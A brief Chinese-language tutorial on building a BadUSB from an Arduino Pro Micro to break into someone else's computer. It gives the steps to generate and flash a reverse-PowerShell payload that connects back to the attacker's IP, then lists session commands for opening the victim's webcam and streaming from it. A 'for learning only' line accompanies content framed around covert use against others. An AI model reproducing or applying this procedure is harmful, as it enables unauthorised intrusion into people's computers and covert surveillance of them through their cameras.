用BadUSB物理入侵别人的电脑
原理
把恶意代码烧录进BadUSB的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。
把带有恶意代码的BadUSB插入目标电脑中,生成反向Shell会话
远程电脑登陆Shell进行各种操作,比如操纵摄像头等...(仅供学习,不要干坏事哦)
制作BadUSB
买一块迷你型的Arduino开发板: Arduino Pro Micro(Atmega32U4)
买一个microUSB的转接头
自制一个好看的外壳...
将恶意代码烧录进BadUSB
打开Kail Linux,作为攻击方电脑
cd Arduino-Reverse-Shell-Generator
sudo ruby reverse_powershell_arduino.rb
输入攻击方的机器ip和自定义端口,一路回车,最终生成Arduino烧录用的脚本并自动启动反向Shell监听
用ArduinoIDE烧录恶意代码
进行攻击。。。
将BadUSB插入目标电脑,有杀毒软件是不行的 😀
回到刚刚烧录代码的Kail Linux机器,应该可以看到已经连接上目标电脑了
输入 sessions -i 1 进入目标电脑系统
输入 webcam_list 扫描可用的摄像头
输入 webcam_stream 1 打开目标摄像头...
or anything you want...
Github地址
Last updated